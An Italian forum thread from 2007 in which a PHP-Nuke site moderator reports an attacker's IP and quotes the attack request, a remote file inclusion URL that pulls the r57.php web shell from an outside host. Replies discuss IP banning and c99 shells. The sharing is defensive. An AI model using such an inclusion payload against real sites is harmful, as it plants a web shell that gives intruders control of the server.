| Precedente :: Successivo |
| Autore |
Messaggio |
_-PaKi-_
Moderatore
Registrato: May 16, 2005
Messaggi: 389
Località: Milano
|
 Inviato: 02-05-2007 20:55 Oggetto: Cercasi disperatamente Lamers |
 |
|
Visto che di lamer al mondo ve ne sono un infinità voglio consigliarvi di fare attenzione, da ieri il mio portale è stato preso di mira da un lamer che nonostante venga bannato e bloccato dal sentinel, continua a tentare un defaciement, qui di seguito allego i dati per permettere a tutti voi di bannare questo ip o range 
Ip:64.50.192.206
query di attacco: www.phpnukeisland.com///modules.php?name=http://secretagent.by.ru/r57.php
 |
|
| Torna in cima |
|
 |
ballacoilupi70
Newbie
Registrato: Jan 24, 2006
Messaggi: 191
|
| Inviato: 03-05-2007 09:37 Oggetto: Re: Cercasi disperatamente Lamers |
|
|
| _-PaKi-_ ha scritto: |
Ip:64.50.192.206
query di attacco: www.phpnukeisland.com///modules.php?name=http://secretagent.by.ru/r57.php
|
Anche il mio sito è ultimamente attaccato da personaggi che scrivono nel Guestbook innumerevoli link a siti poco consigliati 
Li ho bloccati con Sentinel specificando di bloccare l'IP ma nisba!
Una domanda: ma se l'indirizzo IP è dinamico cioè cambia ad ogni connessione a cosa serve bloccare un utente tramite IP?
Forse è solo mia ignoranza ma non comprendo a cosa serva |
|
| Torna in cima |
|
|
Marck92
Newbie
Registrato: Jul 21, 2006
Messaggi: 32
|
| Inviato: 03-05-2007 15:03 Oggetto: |
|
|
| quella query di attacco non credo serva a nulla e non credo nenache che sia un "grande lamer" perchè è un metodo di inclusione che se mai dovesse funzionare, lui vedrà l'ftp del suo sito e non del tuo.. non è un metodo valido per fare attacchi.. |
|
| Torna in cima |
|
|
_-PaKi-_
Moderatore
Registrato: May 16, 2005
Messaggi: 389
Località: Milano
|
| Inviato: 03-05-2007 18:09 Oggetto: |
|
|
caro mark quel tipo di attacco purtroppo è definito in gergo spoffing, con tale attacco è impossibile individuare l'ip almeno in maniera veloce, forse con un tracer puntiglioso e ben preciso si potrebbe risalire al fesso, per quanto riguarda il discorso che non serve a nulla, questo dipende dal tipo di script che tenta di richiamare in fase di attacco, mi riferisco al file r57.php, questa tecnica è ben conosciuta, si inserisce uno script maligno su un server bucato e iddato, cosi tale file sarebbe difficile trovare da parte del vero amministratore, sicuramente tale Lamer avrà anche rottato il server, dico lamer perchè nel comando che viene lanciato pare ci sia un errore di scrittura 
Cmq credimi visto che sono del mestiere il 90% di idioti che si divertono a defacciare portali nuke sono lamer che imposessati di script reperibili dalla rete o scambiati con altri amici, l'unica cosa che sanno fare è l'anciare un comando da console, mi piacerebbe vedere questi piccoli idioti dentro un server loggato in via remota come si comporterebbero |
|
|
| Torna in cima |
|
|
Marck92
Newbie
Registrato: Jul 21, 2006
Messaggi: 32
|
| Inviato: 04-05-2007 00:56 Oggetto: |
|
|
| ma guarda che avrà usato qualcosa tipo uno shell c99 per ad esempio accedere all'ftp ma il file deve risiedere sul server del sito altrimenti ti buca l'ftp di dove è caricato.. io per questo dico che il lamer mi sembra un po fesso.. perchè ha tentato di includere la pagina così.. e non sfruttando l'ip di quel server.. solo così si ovvia al problema che legge i file del server di dove è caricato.. se poi è uno script completamente differente dal tipo shell c99 questo non si può sapere dato che dal titolo non ti dice un granchè.. |
|
| Torna in cima |
|
|
|
FAQ
Cerca
Gruppi utenti
Profilo
Messaggi Privati
Login
